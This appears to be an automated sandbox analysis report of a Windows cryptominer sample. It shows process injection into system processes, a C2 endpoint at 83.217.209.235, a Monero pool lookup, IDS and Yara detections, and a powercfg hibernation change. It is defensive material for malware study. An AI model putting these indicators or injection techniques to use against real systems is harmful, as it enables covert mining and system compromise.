          Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000033.00000002.3369152171.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2173615180.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: driver.exe, 0000001A.00000003.2145145649.000001F307E70000.00000004.00000001.00020000.00000000.sdmp, ftnvuqwjtdwb.sys.26.dr
          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errorb source: svchost.exe, 00000033.00000000.2173436542.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3367839566.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000033.00000002.3369152171.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2173615180.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000033.00000000.2173436542.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3367839566.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: ~1.PDB @ source: svchost.exe, 00000033.00000000.2173514506.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3368381949.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000033.00000000.2173436542.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3367839566.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct4B1.tmpp.pdb source: svchost.exe, 00000033.00000002.3369152171.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2173615180.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
          Source: C:\Windows\System32\winlogon.exeCode function: 21_2_000001E85898DCE0 FindFirstFileExW,21_2_000001E85898DCE0
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000140AE86DCE0 FindFirstFileExW,27_2_00000140AE86DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 30_2_00000195DD5CDCE0 FindFirstFileExW,30_2_00000195DD5CDCE0
          Source: C:\Windows\System32\dwm.exeCode function: 31_2_000001160CA1DCE0 FindFirstFileExW,31_2_000001160CA1DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 46_2_00000257E10ADCE0 FindFirstFileExW,46_2_00000257E10ADCE0
          Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001F28C93DCE0 FindFirstFileExW,47_2_000001F28C93DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 48_2_000001CA9854DCE0 FindFirstFileExW,48_2_000001CA9854DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001D26531DCE0 FindFirstFileExW,49_2_000001D26531DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 50_2_00000254A27DDCE0 FindFirstFileExW,50_2_00000254A27DDCE0
          Source: C:\Windows\System32\svchost.exeCode function: 51_2_0000024B87DDDCE0 FindFirstFileExW,51_2_0000024B87DDDCE0
          Source: C:\Windows\System32\svchost.exeCode function: 52_2_00000205FD40DCE0 FindFirstFileExW,52_2_00000205FD40DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 53_2_000001A2056ADCE0 FindFirstFileExW,53_2_000001A2056ADCE0
          Source: C:\Windows\System32\svchost.exeCode function: 54_2_0000018EC1F6DCE0 FindFirstFileExW,54_2_0000018EC1F6DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 55_2_0000025CE3E0DCE0 FindFirstFileExW,55_2_0000025CE3E0DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 56_2_000002623898DCE0 FindFirstFileExW,56_2_000002623898DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 57_2_000002786E59DCE0 FindFirstFileExW,57_2_000002786E59DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 58_2_000001611FFADCE0 FindFirstFileExW,58_2_000001611FFADCE0
          Source: C:\Windows\System32\svchost.exeCode function: 59_2_0000027C0F38DCE0 FindFirstFileExW,59_2_0000027C0F38DCE0
          Source: global trafficTCP traffic: 192.168.2.5:49704 -> 141.94.96.144:8080
          Source: global trafficTCP traffic: 192.168.2.5:56921 -> 162.159.36.2:53
          Source: Joe Sandbox ViewIP Address: 141.94.96.144 141.94.96.144
          Source: Joe Sandbox ViewASN Name: DFNVereinzurFoerderungeinesDeutschenForschungsnetzese DFNVereinzurFoerderungeinesDeutschenForschungsnetzese
          Source: Joe Sandbox ViewASN Name: INF-NET-ASRU INF-NET-ASRU
          Source: Network trafficSuricata IDS: 2047928 - Severity 2 - ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com) : 192.168.2.5:59674 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.5:49705 -> 83.217.209.235:80
          Source: Network trafficSuricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.5:57087 -> 83.217.209.235:80
          Source: Network trafficSuricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.5:57089 -> 83.217.209.235:80
          Source: Network trafficSuricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.5:49704 -> 141.94.96.144:8080
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.235
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficDNS traffic detected: DNS query: pool.supportxmr.com
          Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
          Source: unknownHTTP traffic detected: POST /yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php HTTP/1.1Accept: */*Connection: closeContent-Length: 485Content-Type: application/jsonHost: 83.217.209.235User-Agent: cpp-httplib/0.12.6
          Source: lsass.exe, 0000001B.00000002.3380812837.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122868011.00000140AE074000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://3csp.icrosof4m/ocp0
          Source: dialer.exe, 0000002D.00000002.3378194513.0000021C6D165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php
          Source: dialer.exe, 0000002D.00000002.3378194513.0000021C6D165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php)L
          Source: dialer.exe, 0000002D.00000002.3378194513.0000021C6D165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php--c
          Source: dialer.exe, 0000002D.00000002.3378194513.0000021C6D165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.phpaL(
          Source: dialer.exe, 0000002D.00000003.2147213918.0000021C6D181000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.phpldn
          Source: dialer.exe, 0000002D.00000002.3378194513.0000021C6D180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.phpo
          Source: lsass.exe, 0000001B.00000000.2123167381.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122868011.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3378242956.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3383068124.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122957095.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122637141.00000140AE000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
          Source: lsass.exe, 0000001B.00000000.2122711438.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3378985480.00000140AE05D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122957095.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3382338563.00000140AE19F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000003.2417098899.00000140AE172000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: lsass.exe, 0000001B.00000000.2122141328.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
          Source: lsass.exe, 0000001B.00000003.2417098899.00000140AE172000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
          Source: lsass.exe, 0000001B.00000000.2123167381.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3383068124.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2123167381.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122868011.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3378242956.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3383068124.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122957095.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122637141.00000140AE000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
          Source: driver.exe, 0000001A.00000003.2145145649.000001F307E70000.00000004.00000001.00020000.00000000.sdmp, ftnvuqwjtdwb.sys.26.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
          Source: driver.exe, 0000001A.00000003.2145145649.000001F307E70000.00000004.00000001.00020000.00000000.sdmp, ftnvuqwjtdwb.sys.26.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
          Source: driver.exe, 0000001A.00000003.2145145649.000001F307E70000.00000004.00000001.00020000.00000000.sdmp, ftnvuqwjtdwb.sys.26.drString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
          Source: driver.exe, 0000001A.00000003.2145145649.000001F307E70000.00000004.00000001.00020000.00000000.sdmp, ftnvuqwjtdwb.sys.26.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0
          Source: lsass.exe, 0000001B.00000000.2123167381.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122868011.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3378242956.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3383068124.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122957095.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122637141.00000140AE000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: lsass.exe, 0000001B.00000000.2122711438.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3378985480.00000140AE05D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122957095.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3382338563.00000140AE19F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000003.2417098899.00000140AE172000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: lsass.exe, 0000001B.00000003.2417098899.00000140AE172000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
          Source: lsass.exe, 0000001B.00000000.2122141328.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
          Source: lsass.exe, 0000001B.00000000.2123167381.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3383068124.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2123167381.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122868011.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3378242956.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3383068124.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122957095.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122637141.00000140AE000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
          Source: lsass.exe, 0000001B.00000000.2122957095.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3382338563.00000140AE19F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000003.2417098899.00000140AE172000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
          Source: lsass.exe, 0000001B.00000000.2122711438.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3378985480.00000140AE05D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122957095.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3382338563.00000140AE19F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000003.2417098899.00000140AE172000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: lsass.exe, 0000001B.00000000.2122141328.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
          Source: lsass.exe, 0000001B.00000000.2123167381.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3383068124.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2123167381.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122868011.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3378242956.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3383068124.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122957095.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122637141.00000140AE000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
          Source: lsass.exe, 0000001B.00000002.3373903281.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122141328.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
          Source: lsass.exe, 0000001B.00000002.3373903281.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122141328.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
          Source: lsass.exe, 0000001B.00000000.2121952764.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3372045209.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
          Source: lsass.exe, 0000001B.00000002.3372519545.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2121998643.00000140AD850000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
          Source: lsass.exe, 0000001B.00000000.2121952764.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3372045209.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
          Source: lsass.exe, 0000001B.00000000.2123167381.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122141328.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122868011.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122711438.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3378985480.00000140AE05D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3378242956.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3383068124.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122957095.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122637141.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3382338563.00000140AE19F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000003.2417098899.00000140AE172000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: lsass.exe, 0000001B.00000000.2122957095.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3382338563.00000140AE19F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000003.2417098899.00000140AE172000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
          Source: lsass.exe, 0000001B.00000000.2123167381.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3383068124.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2123167381.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122868011.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3378242956.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3383068124.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122957095.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122637141.00000140AE000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
          Source: lsass.exe, 0000001B.00000000.2122868011.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122957095.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3382338563.00000140AE19F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000003.2417098899.00000140AE172000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
          Source: svchost.exe, 00000035.00000002.3378496559.000001A204EE0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: lsass.exe, 0000001B.00000000.2121952764.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3372045209.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
          Source: lsass.exe, 0000001B.00000000.2121952764.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3372045209.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
          Source: lsass.exe, 0000001B.00000002.3372519545.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2121952764.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3372045209.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2121998643.00000140AD850000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
          Source: lsass.exe, 0000001B.00000002.3372045209.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: lsass.exe, 0000001B.00000000.2121952764.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3372045209.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
          Source: lsass.exe, 0000001B.00000002.3372045209.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
          Source: lsass.exe, 0000001B.00000000.2123167381.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3383068124.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2123167381.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122868011.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3378242956.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3383068124.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122957095.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2122637141.00000140AE000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
          Source: dialer.exe, 0000002D.00000002.3359712073.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://172.94.1q
          Source: dialer.exe, 0000002D.00000002.3359712073.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 45.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: 45.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
          Source: 45.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
          Source: 0000002D.00000002.3359712073.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: Process Memory Space: dialer.exe PID: 528, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Uses powercfg.exe to modify the power settings
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF749F41394 NtTerminateProcess,0_2_00007FF749F41394
          Source: C:\Windows\System32\dialer.exeCode function: 14_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,14_2_00000001400010C0
          Source: C:\Windows\System32\winlogon.exeCode function: 21_2_000001E8589828C8 NtEnumerateValueKey,NtEnumerateValueKey,21_2_000001E8589828C8
          Source: C:\ProgramData\IGaming\driver.exeCode function: 26_2_00007FF7F4F21394 NtFreezeRegistry,26_2_00007FF7F4F21394
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000140AE86202C NtQuerySystemInformation,StrCmpNIW,27_2_00000140AE86202C
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000140AE86253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,27_2_00000140AE86253C
          Source: C:\Windows\System32\dwm.exeCode function: 31_2_000001160CA128C8 NtEnumerateValueKey,NtEnumerateValueKey,31_2_000001160CA128C8
          Source: C:\Windows\System32\dialer.exeCode function: 42_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,42_2_00000001400010C0
          Source: C:\Windows\System32\dialer.exeCode function: 44_2_0000000140001394 NtQueryFullAttributesFile,44_2_0000000140001394
          Source: C:\Windows\System32\svchost.exeCode function: 50_2_00000254A27D202C NtQuerySystemInformation,StrCmpNIW,50_2_00000254A27D202C
          Source: C:\ProgramData\IGaming\driver.exeFile created: C:\Windows\TEMP\ftnvuqwjtdwb.sysJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_qekbdbcu.ayg.ps1
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF749F43B600_2_00007FF749F43B60
          Source: C:\Windows\System32\dialer.exeCode function: 14_2_000000014000226C14_2_000000014000226C
          Source: C:\Windows\System32\dialer.exeCode function: 14_2_00000001400014D814_2_00000001400014D8
          Source: C:\Windows\System32\dialer.exeCode function: 14_2_000000014000256014_2_0000000140002560
          Source: C:\Windows\System32\winlogon.exeCode function: 21_2_000001E858951F2C21_2_000001E858951F2C
          Source: C:\Windows\System32\winlogon.exeCode function: 21_2_000001E8589638A821_2_000001E8589638A8
          Source: C:\Windows\System32\winlogon.exeCode function: 21_2_000001E85895D0E021_2_000001E85895D0E0
          Source: C:\Windows\System32\winlogon.exeCode function: 21_2_000001E858982B2C21_2_000001E858982B2C
